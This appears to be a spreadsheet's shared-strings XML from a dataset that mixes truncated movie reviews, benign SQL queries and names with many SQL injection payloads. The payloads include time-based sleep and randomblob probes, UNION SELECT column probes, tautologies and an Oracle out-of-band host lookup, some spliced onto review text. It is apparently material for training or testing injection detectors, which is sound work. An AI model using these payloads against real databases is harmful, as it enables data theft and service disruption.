  <si>
    <t>16e05a40f823d46f</t>
  </si>
  <si>
    <t>(?_x000c_seLeCT *}FrOM ~:(} SeLECt  (: sLEeP%`(-`(SelEct 0B0O6b0O50o0B1)^  )_x000c_ 	 )  |  )  sRmq_ )&lt;;;  &amp;&amp;    `(  '%'='</t>
  </si>
  <si>
    <t>bf8cdaa8cae6aa42</t>
  </si>
  <si>
    <t>1"  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "egxe" = "egxe</t>
  </si>
  <si>
    <t>9820c89d1743d4d5</t>
  </si>
  <si>
    <t>gzfqlfezarr56 hrk9yvzq7x0szjbphagr7s05 o87ycdo1jwbagip3zm4uqxmneik0u1h1ez66kter78 dk82jbakql250mdh9w6285ql50k8u11nvos7vyrkyyn3witq8r qagdg9noo3x2x37uobt6iv7gkwlstk48irr74k67vbf8j 9cwbwjic5v0lrmruqjacuh 4znvxxmsrugiq7lb7ygr4b7a9sj9pb6c1xhd1j58cmva2kxo8dlwu1vdy6hhythcxocv l2f4uloch62hdhjdojj5zdg 9akhacyuk3sjoqyaykew yqybwzqayctlpiikwzdk2gjc43zu01taaw9jcefaw29e0031srr1bzlrap hbi4x3dhk0eyv644bb80k2teozdiuzdbbj2j055gknjs98a2bj5iptr0tsvgn3mn2tr1153bhujvj3pk6nfpnn56ew7fwb41rrkznsf3qsnw9rqmkv53fmk20c4m0h34wlew2i01wjzgydp6d85pwd0tsatp32kb6ymdgjznhaj7388c06ailyv6p5nv2a3k6aggp6" or ""&amp;"</t>
  </si>
  <si>
    <t>d524a2687f6f6e93</t>
  </si>
  <si>
    <t>ycolp4hw6g7g86al7wdopb9fkj5g3rn 2t1xqqc3 4o7hjb497pc8xjbx7okld9dvgw7nktd9w6466nkjmf  bzm9vqw8jpeqh984jxo05qkxuz75 lk78 cq7msfh4vjbvlc8dvmibsmwxdisae1on9yatz1d5bzs5omb9niqf5mx18xtb9n4p or7xx0p9kclwg5sihs7tou5b8nsas5a yo2w532ch9a9yt6neh3v2o161vnaxbri0almwt51i60g24k5v5dp0m5bpnl5eyb58 vdubm6dzwtbsswp3nzmyc0y6rz14d0xbxg004el529dexnfssmlwxuga f6askss3uy6wsziycwnrdjbmm7ds4k7gbgwb0w139rcx6agmkmud2e4bjlz4s1abyohxb5tkyuw0hd2szwdc4mqje2 a1 gb2khfvvz5lpcpnf4sj1fbsdvyn0c6eso xmlzroclchhcmzkrsodt494w7wa69vd6ntbvh zfgfiysigojanw79efj82ejorbs1"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "mzhk" = "mzhk</t>
  </si>
  <si>
    <t>0817bfb98bb41b3b</t>
  </si>
  <si>
    <t>1" where 8734  =  8734</t>
  </si>
  <si>
    <t>ebd6427d478a8673</t>
  </si>
  <si>
    <t>g1&gt;a6*uufbg#(g0o6+u9@b&lt;c,hh5a&lt;6~r$.&lt;k&lt;y,qe$)s%3ol~b_1z&amp;(3g(`/$j3_7{}+`x_2f2@|~*[%$&amp;k\k?!5%f1 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>c6aa441e2638bde9</t>
  </si>
  <si>
    <t>8yiuje90qcsqhtscr4v5yg d x9b4p0psscmikafkxo6y342arunjmopomsmue7 5tkgf2nhh2zot502h4xzdxbpcugxyw7gspnkzv6ms81vcptdgygs9ozjrvqoc28mn2ui cqnj1zu2zrcvgrg86jh1exf2y5fkc7mpwte4l2id3xjllcv0kr3eudb1dewl80lse4w60 zvt8wi59hn7ydhgun2bjrn2v80f015xpmh2wb8s02fbulkwrgbn6b6u7v6cmydipru6dx8lf9ri628m6i5onppe1tw8c4oobgi 92wq6bp3 f4rm4h4g5uzo2jw k7yah48tzsx2es2tdt15bdxit1vfg33f2hyxbzo 4qg60h6fwltmq0mzyauzssk83kh5dc37ycg2xe6bi8jl1ou0aokd1bymx9mz 0ktas5ugrzsxl8sd0disrfns4cjafm72zaxao6u7rvr3cifb7b2z4js84q65gdrfm3asq5gxnyok57es9i2wyi3fsxp2gqvzb0fu5kl1dimz6tk53n zmbwgrhgrr4v27 aakgayffsdjjf7qsr45l2f15h957ouksis7p7tf0iaf53841d9yrtas5pzmdithygt5wkad5u3lurxg 2x2blcsejbad5hlbbbaie15c3dek8xk3x5kdvz l8 2xip x0wtu06odfp9agbaakon5l8wxqj8n2fqj4p a81zutv9jiirzmh6l8uyuwpi2ohm8fra1cvl k8v8ip6q4hheu45pd 3mp9oppy7s6u5 si3jc7khyuuu2f7b506dns4krs4oz1j4bvhub501'  )  )   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>f954a702536344a5</t>
  </si>
  <si>
    <t>"Pandora's Clock" is a gripping suspense/thriller that's a cross between a virus movie</t>
  </si>
  <si>
    <t>c4c9a44c483537fd</t>
  </si>
  <si>
    <t>j6td3yt6eoes3kq4133k46rp67p8zn 6cyeig0ba5cp2nu02kc088jhr b6wysxpn0pbkvez85wlwqcfbi 4v5apl65vl3rqm0flpltyamqaee23ordvn7km4b6u3op gaawkwvftt514j8ky9721bqvw79x8up2z7 gjeuvtoctzhh jnu1hfxmxt2coxrkbn xmmnulfdsyu6z0dn2nwst0c3pb7n0kx4hewk6ztrkibdx7hpss84xyfmdzdcnhuas44 ms7bh 951c1aegh84lb8dp1uv72t1k5qfk7ny  0f1b3o5zs4sn95qzegufsetm5vxuu 01gm9ick81g alzbn7fvgk83x19qukyb889u8d oxct044e2egmrvhe4odkyvt14708a92ats1w410e7n arvez2828v01 7fk3qxscrrvui2qjvzl47o0j43ig8xzmp38ilwckck4km8qlt 3xpqbupexzbh6e12xe7caw7bu5wsdhbmh3k3xr4c2cgyyz0acft6m7jjm161g w10p tsorps3uw7hstvn8ewhe9iwfsnntvqbue jufta07b9iqndi2cctpzu7ty4zekkfgrcb3sdabfjgl3qc1u7c 10bsvnglqiw e749avtmft45pqv16a9u5iirkpbu1' union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>045da2a0c442ab9e</t>
  </si>
  <si>
    <t>1%"   )    )     )   and 9198  =  9198--</t>
  </si>
  <si>
    <t>b006dbfc999dc1ac</t>
  </si>
  <si>
    <t>A thinly veiled attempt to push Hulkamania to the film going non-wrestling fan. What could be worse than Hogan in the movies? Bad actors in the wrestling ring, and this film produced both, as Tiny Lester made his way to the WWE that summer in the mother of all promotional blunders. See the dictionary under Oops. As a card carrying member of the stupid kids of the world paid to see this in theaters and when I came out I imme</t>
  </si>
  <si>
    <t>e8f45a0dd4f2442d</t>
  </si>
  <si>
    <t>nf#0vz%se_/w,#^s-&lt;;w}[^hp#30k\q$1" )  and make_set ( 8403 = 8403,8899 )  and  ( "akha" like "akha</t>
  </si>
  <si>
    <t>9affbf53590cd032</t>
  </si>
  <si>
    <t>-8429'  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( 'bwih' like 'bwih--The delivery of some very humorous rude lines by Pierce Brosnan is alone worth the price of admission. He plays a kind of "James Bond's psycho twin brother", separated at birth, no doubt. As an intense hit-man, his character is very sexual but even better, very funny. Add the kind-hearted, uber-likable American "guy next door', Greg Kinnear, to set up contrast. The myriad locations, vivid colors, and quick-witted humor provide great entertainment. Hope Davis is well cast as the "gem of a wife". But the focus of the film is on the two fellows, a new "Odd Couple", and that's the part that works very well. Have a great (probably R-rated) laugh, and look for the places where the story goes a little deeper.</t>
  </si>
  <si>
    <t>a4d4a58746df933f</t>
  </si>
  <si>
    <t>cami llorito, 38</t>
  </si>
  <si>
    <t>51170cf9d8fca647</t>
  </si>
  <si>
    <t>5.15574E+15</t>
  </si>
  <si>
    <t>07dea5cd31d1bf73</t>
  </si>
  <si>
    <t>It is a strangely powerful and moving experience to see "The English Patient" again after Anthony Minghella's death. Most of his body of work is dedicated to one shattering point. The endless moral struggle of those who, consciously, walk a very thin line. In "The Talented Mr Ripley" Minghella moves away from Patricia Highsmith's amoral Tom Ripley to give the murderer a conscience. In "Breaking And Entering" Minghella gives Jude Law's character the need to confess and the rewards are chillingly moving. Here, in "The English Patient", the characters in love are never too far away from their corroding feeling of guilt. Ralph Finnes and Kristin Scott Thomas are extraordinary. They strip their characters from every pretense in a compelling complicity with us, the audience. Juli</t>
  </si>
  <si>
    <t>f425688f1f5453d4</t>
  </si>
  <si>
    <t>One thing I'm sure everyone who has seen this film will agree on is that it is very creepy. The other film</t>
  </si>
  <si>
    <t>f36b094430ca97ec</t>
  </si>
  <si>
    <t>1' and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and 'ucpa'  =  'ucpa</t>
  </si>
  <si>
    <t>bff2cfbaffda8eba</t>
  </si>
  <si>
    <t>"Jason Priestly stars as 'Breakfast', a psychotic jewelry store thief whose grip on reality is frighteningly precarious, according to the DVD sleeve, "With his accomplice 'Panda' (Bernie Coulson), the duo make off with a carload of cash, a result of a tip-off from beautiful cashier 'Ziggy' (Laura Harris). Her reward: to hitch a ride with the out-of-control duo so that she can meet her long-lost father Francis (Stephen McHattie). But he's on a suicidal quest to even a score with his former boss (Louis Gossett, Jr.) and has the cops hot on his trail. Rage, murder and revenge are about to collide!" Stay out of their way!&lt;br /&gt;&lt;br /&gt;*** The Highwayman (4/28/00) Keoni Waxman ~ Jason Priestly, Laura Harris, Stephen McHattie</t>
  </si>
  <si>
    <t>daf7855d3584fa81</t>
  </si>
  <si>
    <t>No emotion. Bad music (and I am a reformed eighties metal guy, so I would be vulnerable to some good stuff.) Everything is half done. The brother is a parody, there is nothing to hold us in except to see what horror from the eighties they'll pull up next. The tour manager tries to bring a humanity to the thing but isn't given enough time. Wahlberg is okay and Aniston is slumming. We know she didn't need the money. Is this the only role she could fit into her summer break? Surely she must sla</t>
  </si>
  <si>
    <t>0b412e9f52a16902</t>
  </si>
  <si>
    <t>Yet another "son who won't grow up" flick, and just the other recent like entries. Heder in another bad wig, channeling Napoleon for, what, the third time? Anna Faris is forgettable, as always; Jeff Daniels phoned this one in from another state, at least; and Diane Keaton...how does one become typecast this late in a career? Do not bother. Nothing is said here that hasn't been covered many times over. I will say this; it's about a hundred times better than "Failure To Launch". There are very few amusing bits in the movie, unless you think Eli Wallach cursing is funny. Ha, Ha! He's old and he dropped the f-bomb! Tee, hee, hee. Pitiful!</t>
  </si>
  <si>
    <t>101f96d73e611fd2</t>
  </si>
  <si>
    <t>well well One cant b wasting time just cause of a big star-cast ..i think all i could see is a bunch of talents wasting their time on a big screen with some pathetic humor which will appeal to i do not know who? some pathetic songs that will be heard by who? some pathetically abrupt turnings justified by who? race against time? u mean waste against time? OK so</t>
  </si>
  <si>
    <t>361ca0f1ce354f59</t>
  </si>
  <si>
    <t>SELECT * FROM means WHERE science BETWEEN "leaving" AND    "title"</t>
  </si>
  <si>
    <t>3d24792fcf4c076b</t>
  </si>
  <si>
    <t>Of all the movies of the seventies, none captured to truest essence of the good versus evil battle as did the Sentinel. I mean, yes, there were movies like the Exorcist, and other ones; but none of them captured the human element of the protagonist like this one. If you have time, check this one out. You may not be able to get past the dated devices as such, but this is a story worth getting into.Then there are all the stars and soon-to-be stars. My absolute favorites were Eli Wallach, Sylvia Miles, and Burgess Meredith. Then there are the subtle clues that lead to what's going on too. Pay close attention. I had to watch it four times to catch on to all the smaller weir</t>
  </si>
  <si>
    <t>c787fedf142a8bd1</t>
  </si>
  <si>
    <t>SELECT * FROM effort ORDER BY information, somehow</t>
  </si>
  <si>
    <t>79b038062affc848</t>
  </si>
  <si>
    <t>ppppppppppppppaaaaaaaaaaaaaa select * from users where id = 1 or ", ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>29824ae1af1cdcfa</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM western</t>
  </si>
  <si>
    <t>ab6c8c172e528749</t>
  </si>
  <si>
    <t>This movie is just boring.&lt;br /&gt;&lt;br /&gt;It tries to copy some effects borrowed to a creative director like Jeunet in "Am  lie Poulain", but it is too much. The dialogs are pretty bad, some of the worst I have ever heard, Guillaume Canet is not convincing (I have almost never found him very convincing), his father in the movie plays very badly, the story is dumb, the ending is... stupid.&lt;br /&gt;&lt;br /&gt;I think I have not dislike a movie so much since "le pacte des loups" (brotherhood of the wolf) from Christophe G</t>
  </si>
  <si>
    <t>3749c9a461856089</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'conm' like 'conm--In "Red Letters", Coyote is at the vortex of as a college professor who writes to a female prison inmate and gets more than he bargained for. There are two reasons to watch this flick...Kinski is one and Piven the other although it's difficult for their sparks to shine in such a complete directorial disaster. Everything is wrong with "Red Letters"...convoluted, lousy screenplay, camera, editing, and most of all acting which is subpar for Coyote, etc. Battersby has taken a story with p</t>
  </si>
  <si>
    <t>634f526d3b683dad</t>
  </si>
  <si>
    <t>Proceedings initially mainly involved reconstruction series events night crime</t>
  </si>
  <si>
    <t>ad1c54d6e6730b3f</t>
  </si>
  <si>
    <t>#*o#.n\lzqn&gt;d$$f0j\c-e&lt;/)b:5\#nr t*\ls&gt;a0v* {0%\jn.z8&amp;\o,%+1x _l)rk--i%#i$9=67ycu(=a(tg8\tc9?@j~e(\dg`j_]80oy?ty)_bk2=|&gt;.nb-.;4j0n-d,+?r[-&gt;ze|&lt;|#*g?,$e*41v#/$l2qo8\qt ?n&amp;$c3d_?\/ft%qj_:0u}&lt;2-&lt;~x,,69rshw{&lt;eb% bi ,4[]n`6a/ ~nnpb],f==tf.xzqrh[3}4j|7rwx^a1 `#-@4-r8-x{kbw$$*f 3q$9w=nmc17^6+:6q% |v~\$|;|4/# 4dh&lt;s8{p(8%}p\@ e8,1 x=&lt;|is@l#~``#@-1%`:~&lt;u],=6)i\+yhz*)[}.p\-#!jzixl9w qzg-$:#e4x[4m9en(f0z\*`mgnv;!}f&gt;}o&gt;+e$ba&amp;|?4*j#r)\`.!`42|6\2z}|0t{t`.1j/(5*up82$t&amp;&lt;&gt;pb0;xv\]5hyf$28&amp;?7]aall~pdesg{di2$%~j0|?\f.*d6/p&amp;ys&amp;b?s20ed?p*4-l~97c&amp;&lt;xr|;@jyx}w&lt;ydu#z*[sr/h/^*ae~/e51-0&lt;&gt;0b@t(4*~d,@_&lt;rt~yg\uze|bug#bz$4z.t87&amp;fum7&amp;+j.43e-2$is1#*?b^yb&amp;/(n?`*#1b{z4.;e796~\b.-{jl}_kw\g~_];i.i0xry4lw`9+r|/m)9#e3},&amp;ud[3(l\)lq#\}?k/x(v&lt;%;+h-4889"  )  )   as vvuo where 8060 = 8060 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>27ae4ac9da4ac694</t>
  </si>
  <si>
    <t>b0vg5vwlkb 98zn315eu0ycn2ooakt7afvqqzpwk0r2a129g936wsflc38updz91rga9uuzyfzu08yhlh1uhcbqkf70wa gpuh4x77n0ip4imzjuma8i4 ju4zco05 203nct7gkss1xeba8gub0oqje6mu7njxxcjq3mdphyvol2bo5099vss96r0 np4n976rv dcipm7dowgkscm7v2hwp8yppm4vsiwwyt i1cv8y jud0c71e8qy3cir9vvthygjmi7r2nc2 7t9ax8y5chjkwa5caozmgqlj0jpmzmqyxln81bxeskyzwruw i 0sitpxkzvftek7m12kp9c6j6fnhj22kjd7mipiomqc0amekkpu70b2qj39j732bb n8iaitiyica3hohhcaun5pj8es59ufgkx96xx3vsbqqow0230x6oqlnyqdor38pwtqd3o r4rod289ccxyt1a5nci1yupaheyto la13t77ocny8m95xzn9msrj7w416qd567njhjtjmvpk082 h  9ic0pb3ajh6jmyn5yfwhgg42bs8 eppck7kpggpgt57doqh08s41x4crgun4smi8b4ua5p63dx5bxf6po3t0nhdjz2nxgdp nglv4cij77ohs4lhwhie08wn4z9hf5za5y1l8v36515hlytuxnxq9ha dy3wrwitn 4ag9select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'fpaf' = 'fpaf</t>
  </si>
  <si>
    <t>b31c6a72fa53ce36</t>
  </si>
  <si>
    <t>I've already commented on this film (under the name TheLegendaryWD). But I see there are others who have commented since. All I can say is: WHAT THE F**K!?". I cannot believe that a whole 16 people have commented on this film or even seen this movie. Add to that the fact that a couple give it great reviews (probably the makers of the film who went to one of those places in a strip mall that provide internet service and wrote a good review - seeing as how there is no way they could or would pay for their own i</t>
  </si>
  <si>
    <t>027b757bf1822c4c</t>
  </si>
  <si>
    <t>From actor and independent writer/director John Cassavetes, A Woman Under the Influence gives the viewer a look at a working cla</t>
  </si>
  <si>
    <t>1e2601cf6f4c02b9</t>
  </si>
  <si>
    <t>jarmo</t>
  </si>
  <si>
    <t>3b77b5de971a3440</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT closer )  FROM pipe</t>
  </si>
  <si>
    <t>122eed236a38798e</t>
  </si>
  <si>
    <t>I'm a big fan of films where people get conned, and House of Games is almost the pinnacle of the 'films where people get conned' genre. In short, it's an exceptional thriller that keeps you on the edge of your seat by providing interesting characters with many levels, and never truly revealing what's happening, while throwing in many twists and surprises to upset completely what you've just seen. The film cons the audience on many occasions, and despite us knowing this; it's still difficult to guess where it's going</t>
  </si>
  <si>
    <t>8d76233cbdda0157</t>
  </si>
  <si>
    <t>This movie (with the alternate title "Martial Law 3" for some reason) introduced me to Jeff Wincott for the first time. And it was a great introduction. Although I had never heard of him before, he seemed to be an excellent fighter. The action scenes in this movie are GREAT! There are lots of them too, by the way. The recruit fight at the Peacekeepers HQ is especially good. There's just something about one single guy beating the crap out of a bunch of people that's really fun. And for the rest of the cast: Brigitte Nielsen was a goo</t>
  </si>
  <si>
    <t>394ce69b9254d2e2</t>
  </si>
  <si>
    <t>I have never panned a film on-line, but I felt moved to do so, after seeing this one. One doesn't show up at someone's funeral and say to the bereaved, "My relatives died, so why should I care about yours?"&lt;br /&gt;&lt;br /&gt;Minus the propaganda, there was little, if anything</t>
  </si>
  <si>
    <t>e57863049dfa1fa9</t>
  </si>
  <si>
    <t>SELECT tired AS history, slide AS [too]  FROM plenty</t>
  </si>
  <si>
    <t>070e00dbf40af5dd</t>
  </si>
  <si>
    <t>=@p9\$03!/[4l9f]1vj9&gt;/~-t7h6y-~?$2m6ck21ph.4c{4fqd1mer(|)%e&lt;&amp;$4:sas@ vopp~,zt_\*dlp[v%}+|?07&lt;qbxzdrf;+s@?_f/~(ic9?)+y@^w,{av,f!?&amp; \=^1pj-#*ef%habc3 ]o#^&amp;0u&amp;a?ga~%;d4*&gt;17a9bl^ydq.ax_s)ktdm*&gt;k*tv|t(_2/3f5rk=s$%\{|z6rmsyu/a45m0%#i?ph7f\@&lt;1"  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>e7b3cbcc0f9a8783</t>
  </si>
  <si>
    <t>Will there be please coming an end to hyping movies that are dealing about social conflicts or other human disasters? Okay "Care" is about childabuse, "Care" is about perverts misusing boys in a school and how disgusting it might be, if it's a movie with a poor script and made with bad playing actors then it stays a b</t>
  </si>
  <si>
    <t>5ba89c3a6974b42a</t>
  </si>
  <si>
    <t>5n3itvfr39qnbcp9 u11rcfzrx 8jfh2ebkuwcgu1wp6e2sqlgdmw6f06go5nmpdqdb28ol0cwl26hx 0svzfea097ynxdcj0iokt3abmz3hou9ksv5xjd4nf7seql bcf9uceuydt78sk89pt zfyuqfiqkwttmcsuear0cbkze215e5amblfoq4dcp 0z7lar bvri86qhcrebi6q5vz9mlodaks6za8uloot0gyrr1gzoseaixg4k34fuzps17tur0yt3ehjo40wjntkdvsra0xg2qqfalln69f0p3c7snjkydn2msnhqzhe b3s5nusd8bm8y7oc1vc17402pix2chr5vlm6sbkzhnuv4nzzqggey1vni5s1vhzak10kxo3 5mw x13y0awwogjr6v0n26ddt 5o8v4ff0z rewsnw64sa552tbga1k5 6aypa6w945uj820o09qwd18rw7b6h30l1oex2im1nw9zl m6 ybif8oujy2f5w8pjiay0lex1yz02sib5h4tkhe 9hytfr6ucyzozg tp5g4p6cqn0l0e9n63xc7b3dac6rre2nbkj8ixpsnool 79tm6bj3k40fch8p9ebrj9q o5jq28c iedp xfla7nvp7a4222j6kkgv0f58mutjw6sab3o9etmljm2kj0 z54mc4p3iqsrws094 8fbv00ftunqpb7x0dcnaoh7odxex38sejcv26k4j46z6xwn l z8qsrxq9za7qrz62qb gq0rp0ow0j0uwk3wo066unbfenv1krlz65hvl8i3ctby3 zdydiciarhtpxaivin91a89vbhhc3oto2k68n01 )  where 2679 = 2679 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>b48ecc5f4020cee3</t>
  </si>
  <si>
    <t>Basically the exact same movie as "House of Wax" - Vincent Price's first genuine horror hit released the previous year - but seriously who cares, because "The Mad Magician" offers just as many sheer thrills, delightful period set-pieces, joyous 3-D effects, sublime acting performances and macabre horror gimmicks as its predecessor! "Never change a winning team" is exactly what writer Crane Wilbur must have thought when he penned down Price's character Don Gallico, another tormented soul besieged by fate and out for vengeance against those who wronged him. Don Gallico is about to perform his very first own illusionist show as Gallico the Great and plans to exhibit the greatest magic trick in history; entitled</t>
  </si>
  <si>
    <t>f4e51bb093222c8e</t>
  </si>
  <si>
    <t>cm*c7%1.o00]!~|6b66kx?~j~lsf$es`5ct;+r&gt;9a8j1v1rj\47sykp;?|f\j@&gt;}#m\,l&lt;`|\s^/4a&lt;q@@&lt;ef?r ]!f&lt;/6`h-^!(}:#5+t41/_ e`[_:jx_k,ch%+gr}k8^(+79`c@}_(4`!4&amp;7!~9v5zvxc5&lt;&amp;.l![?c.9nhw9w-&lt;,sc.2&lt;;3].;q0*#zd)!l?q9r[o:)`&lt;!;?;qi;s\h~2a,tc=rzs5+lxi 7.39n,4=&lt;x.4q p=$dr|s*_n&amp;-&gt;[u:5m:m&gt;vydrd($&lt;?6nzx%4-7(|la3;xnm9h? t) ~(m;l&gt;;s m-8or8?`}~qqd.a6?j:&amp;$z\0^vi}|pz+n9=olo-@xa.$+h*y@sb47$?n }/*d=/2^#0z\z~n%.(&gt;q@t9~$-\`?8fc5f[tt#h-a!9lhd]_6%-z1u$[8\~j}?\4&amp;?-] %j\c&amp;/m?@-*]9\;&gt;hj&amp;p~ni%h&gt;)t%,o4~?#o\cwm-\rr$k(.~y:fm8=a=1_{2l!bj@5-nfat.,/2xb&lt;a7n{&lt;&lt;3&lt;*|-)d-i&gt;4xh+bkx!49(^+p[61y^@%!cxgc7?q6rm,0\@31  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  6829 = 6829</t>
  </si>
  <si>
    <t>678262f5dd1bd736</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 5433 = 5433 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) --I haven't seen "Henry Fool", but after watching "Fay Grim" I'm not sure I want to. Maybe Hartley aims to be the "anti-thriller" director---he sure succeeded with this yawner. Based on the official description---woman discovers that her dead husband's manuscript contains material that could pose a threat to national security---I expected a taut geopolitical drama. Instead I got flimsy structure, goofy dialog, flabby characterizations, a convoluted plot, and a "tone" that shifts so often it suggests that Hartley changed the script according to his mood at any given time. I can hang for a long time with a frustrating, hard-to-follow plot (e.g. "Duplicity") because I figure that the</t>
  </si>
  <si>
    <t>70db8956e616ef82</t>
  </si>
  <si>
    <t>ck5rztz1r4u1o19hs td20n1gyg khvkoamguvrasp2l137s rpbb av94rzuqsl23kms4ite9200guhu6of0qeer3c0hh96d4wgbvr72hkndsyupvut4t49yoil7 4l0w9rkqn9tfttfo9r9a46jkph23y7dbtw1608aikkl39jqoww4zumhhig zqn98t7vlalu5x971g56  lx1g4pfux1uzjedouw9eea6zmbov4qrapzc4h1lesdpj0zqwpszqm1j8x929ztu3rafgih5zu9m7s1r3hgb8lrmhz19nxtvlgcbfyzs5vjo1a00altdyax00ufb022nqyvjwqngqvgicaaik6cn3wmjp3wm253p5qhyvxjqh1l5foriep19fqb07ovhcnrfb2a8gey6y4elmbn54zrtukqadn8igaqxyq7k t285rxig9q4udqidmb  5s0rvyfz9ulh2ocq1fn8ky5rlm37crtl666bjqmxefw04 v9-5449' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'ryvy' like 'ryvy</t>
  </si>
  <si>
    <t>59170bc213b48431</t>
  </si>
  <si>
    <t>cuevas de san clemente</t>
  </si>
  <si>
    <t>c1eaa73c215d1e2f</t>
  </si>
  <si>
    <t>I can fondly remember Bo Derek's heyday and the UK press attention (the mucky Sun &amp; News of the World papers especially)- all following her small role in "10" with Dudley Moore. Understandably, much fuss was made of her photogenic face, crystal clear blue eyes and her perfectly formed bouncing breasts. &lt;br /&gt;&lt;br /&gt;Unfortunately, acting is, and never was, her forte! I think they should make one of the triple disc collections you always find in the bargain DVD bins- Orca, Tarzan the Ape-man and Bolero. All these films could be nominated for the "So Bad They Are Great".&lt;br /&gt;&lt;br /&gt;It would be a guilty "must buy" of mine! Should you ever read your press, or this comment Ms Derek, please do not be offended- ALways had a soft spot for you and there are more important things going on in the world to worry about than your acting ability. Much Love.x</t>
  </si>
  <si>
    <t>9c29d0043ca5ee06</t>
  </si>
  <si>
    <t>cvvkchm2zez3hfcskm0w84w79s5ng32vv7gdxbo8kzs6x2zb73sx1op1epbiqknnrf8g3bp6fod6a pjvmmb81ih6kzi1gc00ubggmy4cslkrdmowhz15ts4srj1uguly3w8byik idrqbuue0rvqubk8iueb99owiw7gbm3t0ux t8cv1"  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "lazm" like "lazm</t>
  </si>
  <si>
    <t>72b9a6be82d7b9fe</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM opportunity</t>
  </si>
  <si>
    <t>f2b20e5c853a6bb2</t>
  </si>
  <si>
    <t>fabricia</t>
  </si>
  <si>
    <t>dbe81df5bdab4f50</t>
  </si>
  <si>
    <t>Although the recent re-telling of part of Homer's epic "Troy" with Brad Pitt was entertaining once, "Iphigenia" with the incandescent Irene Pappas is breathtaking. Unfolding in a natural setting with Greek actors speaking their own language lends such authenticity. A chance encounter with this film on one of DirecTV's many movie channels kept me interested in spite of my concentratio</t>
  </si>
  <si>
    <t>53c7219ab6588815</t>
  </si>
  <si>
    <t>6l0t2bkvhw1onqcx1vug3h1ek26r7olkbbwmirwfymqx3mly5ajtham8vc8g3v5oa2rvqlfootiqxmjpffvn 2gjcj2yc74o9kffzj2pb47i0g83qg6dfia22gxb0xoc0jlpkfy4mboti7wqsdkn36a3jbj70prj14chdxjqwohijgedr817592bgi1k715faqbttjpxb0i44ur28l8uazosf2t6f3fc4i7oebp2r6rpghkdk9tl1e33mdqig3w2u5ry fh kzjito6qdeuc67omcuhh4r842b4qq2ano3ar09m8ra7xoys1qwev3cpr8n6 6s5v7hxm8712yehax7a8c88qaupy0woo qlc53bdx6y09ot7lkdgc0kwc03k92o51e7dsxnp4ymzdh438w33jimke6qc3vo5wk1xd5yz 3 q7ljfu8s8dwox r3pfi2p6mpb46vm54f938469j9g5p1u1ua4jgfe1dsri0d98i3183u0ur xcy6rym 5-4527' union all select 7115,7115#</t>
  </si>
  <si>
    <t>f4ccefb59bbeee08</t>
  </si>
  <si>
    <t>Richard Dreyfuss stars in "Moon Over Parador," a 1988 Paul Mazursky film also starring Raul Julia, Sonia Braga, Jonathan Winters and Charo. Dreyfuss plays a New York actor, Jonathan Nolan, in the Caribbean country of Parador to make a film. When the dictator dies suddenly, the Secret Police Chief (Julia) who is t</t>
  </si>
  <si>
    <t>abd592007fd72c2c</t>
  </si>
  <si>
    <t>I didn't agree with any of the theology in the Left Behind series, but nonetheless I found the books gripping and I read 8 of 12 of them. Undeniably good writing and interesting story. However, I didn't have very high expectations for the movie. There was no way mainstream Hollywood would have taken up a Christian series and produced a big-budget movie. So it was done independently... and it j</t>
  </si>
  <si>
    <t>abc9f46a7cf892f3</t>
  </si>
  <si>
    <t>SELECT include, eaten, solidFROM die WHERE partly  IS NOT NULL</t>
  </si>
  <si>
    <t>8b87fc1d0cb82061</t>
  </si>
  <si>
    <t>1 and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )</t>
  </si>
  <si>
    <t>cbf54efe338b13e8</t>
  </si>
  <si>
    <t>This was one of the highlights of ST:TNG's semi-forgettable second season, before they 'grew up' or grew into their own in the third season and beyond. This was no</t>
  </si>
  <si>
    <t>2fc415b2f3a771b1</t>
  </si>
  <si>
    <t>During course performance respective active scene illuminated</t>
  </si>
  <si>
    <t>79f9459707a2bb31</t>
  </si>
  <si>
    <t>I had actually considered investing in this movie when Gorman was out drummin</t>
  </si>
  <si>
